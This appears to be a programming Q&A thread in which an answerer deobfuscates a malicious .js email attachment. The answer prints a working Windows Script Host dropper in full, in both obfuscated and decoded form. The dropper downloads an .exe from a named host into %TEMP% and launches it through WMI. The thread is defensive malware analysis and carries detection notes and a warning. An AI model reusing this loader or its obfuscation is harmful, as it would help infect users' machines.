javascript – Explain the meaning of the code

Question:

Good afternoon. A stranger tried to send me a résumé as a .doc file. My editors could not open it. Then he sent me a .scr file, which I refused to run. Then he sent me a .js file:

// Analyst note: this is the obfuscated "eval" primitive of the sample.
// The property name is assembled character by character into "Function",
// so the call is `new Function(Upabyd)()` — whatever string is passed in is
// compiled and executed as JavaScript (`this` is the global object here).
// `Yt` and `Ra` are assigned but never read — decoy/junk locals.
function Byhezo(Upabyd){    
     var Yt="56"+"4a"+"58";var Ra="4a"+"52"+"55"+"48"+"4f"; 
     return(new this["F"+"u"+"n"+"c"+"t"+"i"+"o"+"n"](Upabyd)());
}
// Analyst note: single-character decoder. `Deru` is an offset into the key `Yc`.
// `Yc`, `Ry` and `Jime` are assigned without `var`, so they leak into the
// global scope (this would throw under strict mode).
function Hucana(Deru){
     Yc = "4ag6pcSMXtuL05s7zUGW2v9qxdewOyCinTD3PFZEVINbABrYoQHR18hlfjm";
     // Candidate output: the key character at the requested offset.
     Ry = Yc["charAt"](Deru);
     try {
         Jime = Yc["charAt"](Deru);
         // Evaluates `new Function("c,c")()`. For a letter this is an expression
         // referencing an (undefined) identifier and throws a ReferenceError;
         // for a digit it is a plain numeric expression and does not throw.
         Byhezo(Jime+","+Jime);}
    catch (Wa) {
         var Napu = Wa["message"];  
         // Returns the second character of the engine's error text — this relies
         // on the message format of one specific engine (the answer below says IE).
         var Fyby = Napu["substring"]("1", "2");
         return Fyby;
     }
    return Ry;}
  // And then a long run of code follows:   Hucana("{...}")
  // Analyst note: `Egaz` accumulates the decoded payload one character per
  // Hucana() call; the listing is truncated here by the question's author.
  var Egaz=Hucana("21") + Hucana("1") + Hucana("46") + " " + Hucana("44")

We were talking in a chat. There is reason to assume this is not a good person.

I can share his files (.doc, .js, .scr) — message me at @vadim_bondar

Answer:

This is obfuscated code, and some Trojan is probably hidden behind it. You can reverse-engineer it and understand what it does. To do this, right in the editor, you can try to "compile it in your head" 🙂 – unwind the source in the opposite direction and recover the original code. (Send it to me, I'll give it a try too; it's actually quite exciting.) You can also try it yourself. Here is one example of how to do it – Reverse engineering of a malicious fraudulent script

UPD:

Done! So, at the very beginning we have source code of the form:

// Analyst note: the sample's "eval" primitive. The property name is built up
// into "Function", so this is `new Function(Upabyd)()` on the global object —
// the argument string is compiled and run as JavaScript.
// `Yt` and `Ra` are never read; they are decoy locals.
function Byhezo(Upabyd) {
    var Yt = "56" + "4a" + "58";
    var Ra = "4a" + "52" + "55" + "48" + "4f";
    return (new this["F" + "u" + "n" + "c" + "t" + "i" + "o" + "n"](Upabyd)());
}
// Analyst note: one-character decoder keyed by `Yc`; `Deru` is an offset.
// `Yc`, `Ry` and `Jime` are created as implicit globals (no `var`).
function Hucana(Deru) {
    Yc = "4ag6pcSMXtuL05s7zUGW2v9qxdewOyCinTD3PFZEVINbABrYoQHR18hlfjm";
    // Default result: the key character at the offset.
    Ry = Yc["charAt"](Deru);
    try {
        Jime = Yc["charAt"](Deru);
        // `new Function("c,c")()`: a letter becomes a reference to an undefined
        // identifier and throws; a digit is a numeric expression and falls through.
        Byhezo(Jime + "," + Jime);
    } catch (Wa) {
        // The answer's author prefixed a quote so that substring(1, 2) yields the
        // first character of the message — presumably to reproduce the IE-specific
        // message format in another engine; confirm against the original sample.
        var Napu = "'" + Wa["message"];
        var Fyby = Napu["substring"]("1", "2");
        return Fyby;
    }
    return Ry;
}
// Analyst note: `Egaz` is the decoded loader source (one Hucana() call per
// character); the final line hands it to Byhezo, i.e. `new Function(Egaz)()`.
// Commenting out that last line and dumping `Egaz` yields the next-stage script.
var Egaz = Hucana("21") + Hucana("1") + Hucana("46") + " " + Hucana("44") + /* 150 KB of text */ + ")" + ";";
Byhezo(Egaz);

The Egaz variable accumulates the source of the future loader JS code. To build it, a decoder is used – the Hucana function with the Yc key inside it. The function picks out the required character at the given offset and runs it through Byhezo (which in turn executes (new Function('injected code'))() ). If that raises an error (this only works in IE!), the decoder returns the second character of the error message; otherwise it returns the decoded character from the key.

If you comment out the very last line and print what has accumulated in Egaz, you get a preliminary source of the loader (I replaced the original name Ajosesitufowyzyzygoqol with a short _):

// Analyst note: string table of the second stage. Entries 0..58 are single
// characters (the same 59-character alphabet that `Isag` below concatenates);
// entries 59..70 are multi-character fragments used verbatim: ".", ".e", "%",
// "92", "100000000", ".exe", "winmgmts:Win32_Process", "20", " ", "/", ":", "-".
var _ = ["\x64", "\x61", "\x68", "\x49", "\x52", "\x4f", "\x63", "\x79", "\x4e", "\x48", "\x39", "\x65", "\x43", "\x54", "\x73", "\x47", "\x32", "\x72", "\x59", "\x55", "\x37", "\x4c", "\x58", "\x70", "\x6f", "\x7a", "\x38", "\x78", "\x31", "\x4d", "\x53", "\x69", "\x6e", "\x71", "\x41", "\x67", "\x51", "\x33", "\x76", "\x42", "\x6c", "\x6a", "\x62", "\x50", "\x5a", "\x46", "\x74", "\x66", "\x35", "\x75", "\x45", "\x77", "\x30", "\x6d", "\x44", "\x34", "\x36", "\x57", "\x56", "\x2e", "\x2e\x65", "\x25", "\x39\x32", "\x31\x30\x30\x30\x30\x30\x30\x30\x30", "\x2e\x65\x78\x65", "\x77\x69\x6e\x6d\x67\x6d\x74\x73\x3a\x57\x69\x6e\x33\x32\x5f\x50\x72\x6f\x63\x65\x73\x73", "\x32\x30", "\x20", "\x2f", "\x3a", "\x2d"];

// Analyst note: obfuscated form of the loader. Every identifier-looking string
// is assembled from the `_` table; the decoded listing further down the page
// shows the readable names. The comments below give the decoded value of each
// line so the two listings can be read side by side.
function Zevo(Agyz, Ul) {
    // Entries 0..58 joined together = the alphabet string; `Isag` is never used in this function.
    var Isag = _[0] + _[1] + _[2] + _[3] + _[4] + _[5] + _[6] + _[7] + _[8] + _[9] + _[10] + _[11] + _[12] + _[13] + _[14] + _[15] + _[16] + _[17] + _[18] + _[19] + _[20] + _[21] + _[22] + _[23] + _[24] + _[25] + _[26] + _[27] + _[28] + _[29] + _[30] + _[31] + _[32] + _[33] + _[34] + _[35] + _[36] + _[37] + _[38] + _[39] + _[40] + _[41] + _[42] + _[43] + _[44] + _[45] + _[46] + _[47] + _[48] + _[49] + _[50] + _[51] + _[52] + _[53] + _[54] + _[55] + _[56] + _[57] + _[58];
    try {
        // Decodes to this["screen"]["width"]. In a browser this succeeds and nothing
        // else happens; where `screen` does not exist the access throws and the
        // catch block — the actual payload — runs.
        var sc = this[_[14] + _[6] + _[17] + _[11] + _[11] + _[32]][_[51] + _[31] + _[0] + _[46] + _[2]];
    } catch (ers) {
        // new ActiveXObject("WScript.Shell")
        var Uduh = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[57] + _[30] + _[6] + _[17] + _[31] + _[23] + _[46] + _[59] + _[30] + _[2] + _[11] + _[40] + _[40]);
        // if (Ul == ".exe")
        if (Ul == _[60] + _[27] + _[11]) {
            // Qi = ExpandEnvironmentStrings("%TEMP%") + "\" + round(random() * 100000000) + ".exe"
            // i.e. a drop path in the temp folder with a random numeric name.
            var Qi = Uduh[_[50] + _[27] + _[23] + _[1] + _[32] + _[0] + _[50] + _[32] + _[38] + _[31] + _[17] + _[24] + _[32] + _[53] + _[11] + _[32] + _[46] + _[30] + _[46] + _[17] + _[31] + _[32] + _[35] + _[14]](_[61] + _[13] + _[50] + _[29] + _[43] + _[61]) + this[_[30] + _[46] + _[17] + _[31] + _[32] + _[35]][_[47] + _[17] + _[24] + _[53] + _[12] + _[2] + _[1] + _[17] + _[12] + _[24] + _[0] + _[11]](_[62]) + this[_[29] + _[1] + _[46] + _[2]][_[17] + _[24] + _[49] + _[32] + _[0]](this[_[29] + _[1] + _[46] + _[2]][_[17] + _[1] + _[32] + _[0] + _[24] + _[53]]() * _[63]) + _[64];
        }
        // Written later, never read.
        var Boxa = 0;
        // new ActiveXObject("MSXML2.XMLHTTP")
        var Fihali = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[29] + _[30] + _[22] + _[29] + _[21] + _[16] + _[59] + _[22] + _[29] + _[21] + _[9] + _[13] + _[13] + _[43]);
        // Fihali.onreadystatechange = function () { ... } — runs when the download finishes.
        Fihali[_[24] + _[32] + _[17] + _[11] + _[1] + _[0] + _[7] + _[14] + _[46] + _[1] + _[46] + _[11] + _[6] + _[2] + _[1] + _[32] + _[35] + _[11]] = function () {
            // if (readyState == "4" && status == "200")
            if (Fihali[_[17] + _[11] + _[1] + _[0] + _[7] + _[30] + _[46] + _[1] + _[46] + _[11]] == _[55] && Fihali[_[14] + _[46] + _[1] + _[46] + _[49] + _[14]] == _[16] + _[52] + _[52]) {
                // new ActiveXObject("ADODB.Stream"); open(); type = "1"; write(ResponseBody)
                var Capo = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[34] + _[54] + _[5] + _[54] + _[39] + _[59] + _[30] + _[46] + _[17] + _[11] + _[1] + _[53]);
                Capo[_[24] + _[23] + _[11] + _[32]]();
                Capo[_[46] + _[7] + _[23] + _[11]] = _[28];
                Capo[_[51] + _[17] + _[31] + _[46] + _[11]](Fihali[_[4] + _[11] + _[14] + _[23] + _[24] + _[32] + _[14] + _[11] + _[39] + _[24] + _[0] + _[7]]);
                // if (size > "0")
                if (Capo[_[14] + _[31] + _[25] + _[11]] > _[52]) {
                    Boxa = _[28];
                    // position = "0"; saveToFile(Qi, "2") — the response body is dropped to disk.
                    Capo[_[23] + _[24] + _[14] + _[31] + _[46] + _[31] + _[24] + _[32]] = _[52];
                    Capo[_[14] + _[1] + _[38] + _[11] + _[13] + _[24] + _[45] + _[31] + _[40] + _[11]](Qi, _[16]);
                    try {
                        // if (Ul == ".exe")
                        if (Ul == _[64]) {
                            var result = _[0];
                            try {
                                var processid;
                                // GetObject("winmgmts:Win32_Process").Create(Qi, ...) — launches the dropped file via WMI.
                                var query = GetObject(_[65]);
                                result = query.Create(Qi, null, null, processid);
                            } catch (er) {
                                var result = _[66];
                            }
                            // `result = !"0"` assigns false (a non-empty string is truthy),
                            // so the WScript.Shell "cmd /c" fallback below never executes.
                            if (result = !_[52]) {
                                Uduh[_[4] + _[49] + _[32]](_[6] + _[53] + _[0] + _[67] + _[68] + _[6] + _[67] + Qi, _[52], _[52]);
                            }
                        }
                    } catch (er) {
                    }
                    ;
                }
                // close()
                ;Capo[_[6] + _[40] + _[24] + _[14] + _[11]]();
            }
            ;
        };
        try {
            // open("GET", Agyz, "false"); send()
            Fihali[_[24] + _[23] + _[11] + _[32]](_[15] + _[50] + _[13], Agyz, _[47] + _[1] + _[40] + _[14] + _[11]);
            Fihali[_[14] + _[11] + _[32] + _[0]]();
        } catch (er) {
        }
        ;
    }
};
// Entry point: Zevo("<download URL>", ".exe") — the URL is spelled out in the decoded listing below.
Zevo(_[2] + _[46] + _[46] + _[23] + _[69] + _[68] + _[68] + _[14] + _[1] + _[53] + _[7] + _[17] + _[1] + _[31] + _[20] + _[20] + _[20] + _[53] + _[59] + _[23] + _[70] + _[2] + _[24] + _[14] + _[46] + _[59] + _[31] + _[32] + _[68] + _[20] + _[20] + _[20] + _[59] + _[11] + _[27] + _[11], _[64]);

This code is still unreadable, but a small decoder in PHP is enough to fix that …

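/**
 * Inline an obfuscator's string table into JS source.
 *
 * Every reference of the form `_[i]` is replaced by the i-th table entry as a
 * double-quoted JS literal, then neighbouring literals (`"a" + "b"`) are folded
 * into one (`"ab"`).
 *
 * @param array  $table string table: index => fragment
 * @param string $src   obfuscated JS source referencing the table as `_[i]`
 * @return string source with the table inlined
 */
function decodeStringTable(array $table, $src)
{
    foreach ($table as $i => $char) {
        // Escape quote and backslash so a fragment cannot break the JS literal
        // it is wrapped in (no-op for the fragments of this sample).
        $literal = '"' . addcslashes($char, '"\\') . '"';
        $src = str_replace('_[' . $i . ']', $literal, $src);
    }
    // "a" + "b" -> "ab"
    return str_replace('" + "', '', $src);
}

$Ajosesitufowyzyzygoqol = ["\x64", "\x61", /* cut to save space */ "\x3a", "\x2d"];
$src = <<<GOVNO
    тут исходник из js
GOVNO;
// Decoded output lands next to this script; inspect it there.
file_put_contents(__DIR__ . "/tmp.txt", decodeStringTable($Ajosesitufowyzyzygoqol, $src));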

… and after running it we get the source in a friendlier form:

// Analyst note: deobfuscated downloader. Observable behaviour, top to bottom:
// an HTTP GET of `Agyz`, the response body written as a binary file with a random
// numeric name under %TEMP%, and that file started through WMI Win32_Process.
// Useful signals for detection: wscript/cscript creating MSXML2.XMLHTTP,
// ADODB.Stream and WScript.Shell objects, a new .exe appearing in %TEMP%, and a
// process created by WMI from that path. Everything runs under the global `this`.
//
// @param {string} Agyz  URL to download
// @param {string} Ul    extension tag; only ".exe" is handled
function Zevo(Agyz, Ul) {
    // Assigned but never used in this function (same alphabet as the `_` table).
    var Isag = "dahIROcyNH9eCTsG2rYU7LXpoz8x1MSinqAgQ3vBljbPZFtf5uEw0mD46WV";
    try {
        // Environment check: `screen` exists in a browser, so nothing further happens
        // there. Where the access throws — e.g. under Windows Script Host, which is
        // where a double-clicked .js attachment runs — the catch block is the payload.
        var sc = this["screen"]["width"];
    } catch (ers) {
        var Uduh = new this["ActiveXObject"]("WScript.Shell");
        if (Ul == ".exe") {
            // Drop path: %TEMP% + "\" (char 92) + random integer up to 1e8 + ".exe".
            // Note that `Qi` is only defined when Ul == ".exe"; for any other tag the
            // saveToFile call below would receive undefined.
            var Qi = Uduh["ExpandEnvironmentStrings"]("%TEMP%") + this["String"]["fromCharCode"]("92") + this["Math"]["round"](this["Math"]["random"]() * "100000000") + ".exe";
        }
        // Set below, never read.
        var Boxa = 0;
        var Fihali = new this["ActiveXObject"]("MSXML2.XMLHTTP");
        // Fires as the request progresses; the body only acts on a completed 200 response.
        Fihali["onreadystatechange"] = function () {
            if (Fihali["readyState"] == "4" && Fihali["status"] == "200") {
                // ADODB.Stream in binary mode (type 1) receives the raw response bytes.
                var Capo = new this["ActiveXObject"]("ADODB.Stream");
                Capo["open"]();
                Capo["type"] = "1";
                Capo["write"](Fihali["ResponseBody"]);
                if (Capo["size"] > "0") {
                    Boxa = "1";
                    Capo["position"] = "0";
                    // Mode 2 = create/overwrite: the download is persisted to `Qi`.
                    Capo["saveToFile"](Qi, "2");
                    try {
                        if (Ul == ".exe") {
                            var result = "d";
                            try {
                                var processid;
                                // Process creation via WMI rather than WScript.Shell.Run —
                                // the dropped file is started as a new process.
                                var query = GetObject("winmgmts:Win32_Process");
                                result = query.Create(Qi, null, null, processid);
                            } catch (er) {
                                var result = "20";
                            }
                            // Assignment, not comparison: `!"0"` is false (non-empty
                            // string is truthy), so `result` becomes false and the
                            // "cmd /c" fallback below is dead code.
                            if (result = !"0") {
                                Uduh["Run"]("cmd /c " + Qi, "0", "0");
                            }
                        }
                    } catch (er) {
                        //
                    }
                }
                Capo["close"]();
            }
        };
        try {
            // The async flag is passed as the string "false", not a boolean; either way
            // completion is handled in the onreadystatechange handler above.
            Fihali["open"]("GET", Agyz, "false");
            Fihali["send"]();
        } catch (er) {
            // Errors are swallowed: a failed download leaves no trace in the script itself.
        }
    }
}
// Entry point: the hard-coded download URL and drop-path extension. The URL is the
// sample's network indicator — do not browse to it.
Zevo("http://samyrai777m.p-host.in/777.exe", ".exe");

And what do we see here?! Oh my God! Yes, this is a loader that downloads an executable and launches it right on your beloved Windows!

The file is saved to the temporary folder under a random name: var Qi = Uduh["ExpandEnvironmentStrings"]("%TEMP%") + this["String"]["fromCharCode"]("92") + this["Math"]["round"](this["Math"]["random"]() * "100000000") + ".exe";

The rest, I think, is clear enough. I do not advise following the link or running the application from the last line of the source code.
